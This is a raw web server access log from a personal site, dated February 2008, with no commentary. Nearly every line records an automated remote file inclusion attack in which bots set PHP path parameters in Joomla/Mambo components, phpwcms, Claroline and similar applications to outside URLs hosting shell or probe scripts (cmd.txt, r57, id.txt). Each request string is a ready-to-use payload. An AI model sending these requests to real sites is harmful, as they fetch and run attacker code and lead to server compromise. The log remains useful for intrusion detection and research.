62.85.45.65 - - [25/Feb/2008:04:25:13 -0800] "GET /logs/access_071030.log HTTP/1.0" 200 28194 "http://www.1comprar-viagra.net" "Mozilla/4.0 (compatible; Powermarks/3.5; Windows 95/98/2000/NT)" "www.dmulk.com"
62.85.45.65 - - [25/Feb/2008:04:25:14 -0800] "GET / HTTP/1.0" 200 3078 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; Powermarks/3.5; Windows 95/98/2000/NT)" "www.dmulk.com"
62.85.45.65 - - [25/Feb/2008:04:25:15 -0800] "GET /warboard/ HTTP/1.0" 401 395 "http://www.dmulk.com/warboard/" "Mozilla/4.0 (compatible; Powermarks/3.5; Windows 95/98/2000/NT)" "www.dmulk.com"
209.31.183.74 - - [25/Feb/2008:04:25:17 -0800] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.31.183.74 - - [25/Feb/2008:04:25:17 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.31.183.74 - - [25/Feb/2008:04:25:17 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.252.59 - - [25/Feb/2008:04:25:17 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
62.75.252.59 - - [25/Feb/2008:04:25:21 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
69.20.54.118 - - [25/Feb/2008:04:25:24 -0800] "GET /logs/access.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://avvvv.altervista.org/start.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:04:25:25 -0800] "GET /logs//update/update2.php?lang=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:04:25:25 -0800] "GET //update/update2.php?lang=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
84.18.207.64 - - [25/Feb/2008:04:25:59 -0800] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.64 - - [25/Feb/2008:04:25:59 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.20.54.118 - - [25/Feb/2008:04:26:03 -0800] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://avvvv.altervista.org/start.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.114.223.160 - - [25/Feb/2008:04:26:09 -0800] "GET /logs/access_071225.log//oneadmin/photogallery/include.php?path[docroot]=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
210.114.223.160 - - [25/Feb/2008:04:26:10 -0800] "GET /logs/access_071225.log/errors.php?error=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
58.232.131.124 - - [25/Feb/2008:04:26:21 -0800] "GET /logs/access_080117.loghttp://cccryuan1918ssdf.nightmail.ru/babyboy? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:04:26:31 -0800] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:04:26:31 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:04:26:32 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.20.54.118 - - [25/Feb/2008:04:26:47 -0800] "GET /logs/access.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://avvvv.altervista.org/start.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:04:28:03 -0800] "GET /payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.96.247.163 - - [25/Feb/2008:04:28:25 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://utilz.iespana.es/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.185.237.125 - - [25/Feb/2008:04:28:30 -0800] "GET /logs/access_080126.log/////?mosConfig_absolute_path=http://assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.74.120.24 - - [25/Feb/2008:04:28:36 -0800] "GET /logs/access_080106.log//skin/zero_vote/admin.php?dir=http://www.karitasi.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.74.120.24 - - [25/Feb/2008:04:28:36 -0800] "GET //skin/zero_vote/admin.php?dir=http://www.karitasi.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.74.120.24 - - [25/Feb/2008:04:28:37 -0800] "GET /logs//skin/zero_vote/admin.php?dir=http://www.karitasi.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.73.126.21 - - [25/Feb/2008:04:28:42 -0800] "GET /logs/access.loghttp://cccryuan1918ssdf.nightmail.ru/babyboy? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "www.dmulk.com"
85.13.129.226 - - [25/Feb/2008:04:28:44 -0800] "GET /?mosConfig_absolute_path=http://cfemp.com/pdf/test.txt??? HTTP/1.1" 200 3094 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
85.13.129.226 - - [25/Feb/2008:04:28:44 -0800] "GET /logs/?mosConfig_absolute_path=http://cfemp.com/pdf/test.txt??? HTTP/1.1" 200 36116 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
70.84.237.162 - - [25/Feb/2008:04:29:08 -0800] "GET /logs/access_080103.log/skins/advanced/advanced2.php?pluginpath[0]=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.143.142.163 - - [25/Feb/2008:04:29:26 -0800] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.47.247.136 - - [25/Feb/2008:04:29:26 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.143.142.163 - - [25/Feb/2008:04:29:27 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.12.50.119 - - [25/Feb/2008:04:29:32 -0800] "GET /logs/claroline/tracking/userLog.php?rootSys=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
85.12.50.119 - - [25/Feb/2008:04:29:32 -0800] "GET /claroline/tracking/userLog.php?rootSys=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
216.187.94.179 - - [25/Feb/2008:04:29:34 -0800] "GET /logs//SQuery/lib/gore.php?libpath=http://www.indicce.com/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.74.120.24 - - [25/Feb/2008:04:29:51 -0800] "GET /logs/access_071214.log//skin/zero_vote/admin.php?dir=http://www.karitasi.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.234.116.170 - - [25/Feb/2008:04:30:22 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
211.234.116.170 - - [25/Feb/2008:04:30:22 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:04:30:25 -0800] "GET /logs/access_080123.log/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.47.247.136 - - [25/Feb/2008:04:30:41 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.111.157.66 - - [25/Feb/2008:04:30:52 -0800] "GET /?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 200 3094 "-" "libwww-perl/5.805" "www.dmulk.com"
200.96.247.163 - - [25/Feb/2008:04:30:57 -0800] "GET /?mosConfig_absolute_path=http://utilz.iespana.es/safe.txt? HTTP/1.1" 200 3094 "-" "libwww-perl/5.803" "www.dmulk.com"
200.96.247.163 - - [25/Feb/2008:04:30:57 -0800] "GET /?mosConfig_absolute_path=http://utilz.iespana.es/safe.txt? HTTP/1.1" 200 3094 "-" "libwww-perl/5.803" "www.dmulk.com"
216.183.98.30 - - [25/Feb/2008:04:31:00 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.servstra.com/forums/html/avatars/plekih/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
216.183.98.30 - - [25/Feb/2008:04:31:00 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.servstra.com/forums/html/avatars/plekih/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
61.73.126.21 - - [25/Feb/2008:04:31:05 -0800] "GET /logs/access_080211.loghttp://cccryuan1918ssdf.nightmail.ru/babyboy? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.7) Gecko/20050414 Firefox/2.0.5" "www.dmulk.com"
202.47.247.136 - - [25/Feb/2008:04:31:25 -0800] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.13.129.226 - - [25/Feb/2008:04:31:30 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://cfemp.com/pdf/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
85.13.129.226 - - [25/Feb/2008:04:31:33 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://cfemp.com/pdf/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
82.112.124.79 - - [25/Feb/2008:04:31:55 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://suwung.890m.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
82.112.124.79 - - [25/Feb/2008:04:31:55 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://suwung.890m.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
67.159.30.77 - - [25/Feb/2008:04:32:41 -0800] "GET /claroline/tracking/userLog.php?rootSys=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
67.159.30.77 - - [25/Feb/2008:04:32:41 -0800] "GET /logs/claroline/tracking/userLog.php?rootSys=http://www.rednetcat.com/cattalk/wp-content/plugins/mygallery/myfunctions/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
85.214.93.154 - - [25/Feb/2008:04:33:47 -0800] "GET /?mosConfig_absolute_path=http://www.thelatinpower.com/modules/echo.txt? HTTP/1.1" 200 3094 "-" "libwww-perl/5.805" "www.dmulk.com"
68.161.236.45 - - [25/Feb/2008:04:33:48 -0800] "GET /logs/access_080201.log/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
68.161.236.45 - - [25/Feb/2008:04:33:49 -0800] "GET /?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.0" 200 3078 "-" "libwww-perl/5.53" "www.dmulk.com"
68.161.236.45 - - [25/Feb/2008:04:33:49 -0800] "GET /logs/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.0" 200 36100 "-" "libwww-perl/5.53" "www.dmulk.com"
68.161.236.45 - - [25/Feb/2008:04:34:07 -0800] "GET /logs/access_080131.log/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:04:34:11 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:04:34:11 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
65.98.100.202 - - [25/Feb/2008:04:34:13 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://kaizo.hut2.ru/new/ro.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
65.98.100.202 - - [25/Feb/2008:04:34:14 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
74.6.22.154 - - [25/Feb/2008:04:34:25 -0800] "GET /bikes/?D=A HTTP/1.0" 200 2168 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.161.236.45 - - [25/Feb/2008:04:34:32 -0800] "GET /?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.0" 200 3078 "-" "libwww-perl/5.53" "www.dmulk.com"
65.98.100.202 - - [25/Feb/2008:04:34:33 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://kaizo.hut2.ru/new/ro.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
65.98.100.202 - - [25/Feb/2008:04:34:38 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
83.148.73.134 - - [25/Feb/2008:04:34:42 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://suwung.890m.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
83.148.73.134 - - [25/Feb/2008:04:34:42 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://suwung.890m.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
72.36.179.98 - - [25/Feb/2008:04:35:26 -0800] "GET /logs/access_080128.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.179.98 - - [25/Feb/2008:04:35:27 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.179.98 - - [25/Feb/2008:04:35:27 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.233.7.68 - - [25/Feb/2008:04:35:32 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
211.233.7.68 - - [25/Feb/2008:04:35:32 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
209.200.246.89 - - [25/Feb/2008:04:35:39 -0800] "GET /logs/access_080128.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
209.200.246.89 - - [25/Feb/2008:04:35:39 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
209.200.246.89 - - [25/Feb/2008:04:35:44 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
216.183.98.30 - - [25/Feb/2008:04:37:12 -0800] "GET /logs/access_080120.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.servstra.com/forums/html/avatars/plekih/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.50.214.191 - - [25/Feb/2008:04:37:40 -0800] "GET //cart_content.php?cart_isp_root=http://www.nieuw-solutions.com/fotos/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:04:38:04 -0800] "GET /logs/access_080201.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.111.157.66 - - [25/Feb/2008:04:38:14 -0800] "GET /logs/access_080201.log/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.111.157.66 - - [25/Feb/2008:04:38:14 -0800] "GET /?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 200 3094 "-" "libwww-perl/5.805" "www.dmulk.com"
200.111.157.66 - - [25/Feb/2008:04:38:22 -0800] "GET /logs/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 200 36116 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.179.98 - - [25/Feb/2008:04:38:46 -0800] "GET /logs/access_080101.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:04:39:14 -0800] "GET /logs/access_080201.log/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:04:39:26 -0800] "GET /?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 200 3094 "-" "libwww-perl/5.805" "www.dmulk.com"
200.111.157.66 - - [25/Feb/2008:04:39:30 -0800] "GET /logs/access_080131.log/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:04:39:33 -0800] "GET /logs/?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 200 36116 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.37 - - [25/Feb/2008:04:39:39 -0800] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://www.sambis.ru/forum/files/sambis.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.194.37 - - [25/Feb/2008:04:39:39 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.sambis.ru/forum/files/sambis.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.31.183.74 - - [25/Feb/2008:04:39:52 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.246.89 - - [25/Feb/2008:04:39:58 -0800] "GET /logs/access_080101.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
89.108.66.202 - - [25/Feb/2008:04:40:04 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.114.223.160 - - [25/Feb/2008:04:40:10 -0800] "GET /logs/access_080131.log//oneadmin/photogallery/include.php?path[docroot]=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
210.114.223.160 - - [25/Feb/2008:04:40:10 -0800] "GET /logs/access_080131.log/errors.php?error=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
210.114.223.160 - - [25/Feb/2008:04:40:10 -0800] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
210.114.223.160 - - [25/Feb/2008:04:40:11 -0800] "GET /errors.php?error=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
210.114.223.160 - - [25/Feb/2008:04:40:12 -0800] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
210.114.223.160 - - [25/Feb/2008:04:40:12 -0800] "GET /logs/errors.php?error=http://www.plantoursundpartner.de/_scripte/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
69.64.33.241 - - [25/Feb/2008:04:40:27 -0800] "GET /logs/access.log//index.php?option=com_http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.33.241 - - [25/Feb/2008:04:40:27 -0800] "GET //index.php?option=com_http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.33.241 - - [25/Feb/2008:04:40:27 -0800] "GET /logs//index.php?option=com_http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:04:40:39 -0800] "GET /logs/access_080131.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:04:40:39 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:04:40:39 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.248.101.69 - - [25/Feb/2008:04:41:03 -0800] "GET /logs/access_080128.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [25/Feb/2008:04:41:04 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [25/Feb/2008:04:41:04 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [25/Feb/2008:04:41:09 -0800] "GET /logs/access_080128.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
